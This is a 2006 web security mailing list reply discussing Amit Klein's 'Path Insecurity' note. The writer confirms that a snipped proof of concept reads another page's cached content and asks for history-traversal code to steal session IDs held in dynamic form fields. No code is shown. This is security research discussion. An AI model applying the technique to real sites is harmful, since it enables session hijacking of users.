Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"

["Brian Eaton" <eaton.lists@xxxxxxxxx>]

On 5/2/06, Amit Klein (AKsecurity) <aksecurity@xxxxxxxxxx> wrote:
> On 2 May 2006 at 12:42, Brian Eaton wrote:
> > I've spent the past day or two looking at javascript error messages
> > without being able to get this to actually work.  Are you willing to
> > share a proof-of-concept?
> >
<---snip---->
> Fire /foo/attack.html, it'll open /bar/page1.html, then after 3 seconds, it'll pop-up
> "hello world" (from the body of /bar/page1.html).
>
> Hope this helps.

It did help, actually.  This will show the cached version of
/bar/page1.html, assuming the headers associated with the page allow
caching.  If /bar/page1.html has headers prohibiting caching, then a
new request for /bar/page1.html is made.

I'm interested in techniques that let you get at the previously viewed
page, because of the ongoing discussion about session IDs in form
fields.  Making a new request for the page is sufficient sometimes,
but if you want to steal a dynamic form field it is not enough.

I know the browser has the previous version of /bar/page1.html around
even with "no-cache" headers, because I can view it with the forward
and back buttons in my browser.  But I can't figure out how to get to
it with javascript.  You mentioned traversing the history list in your
original note - do you still have that code around?

Regards,
Brian

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/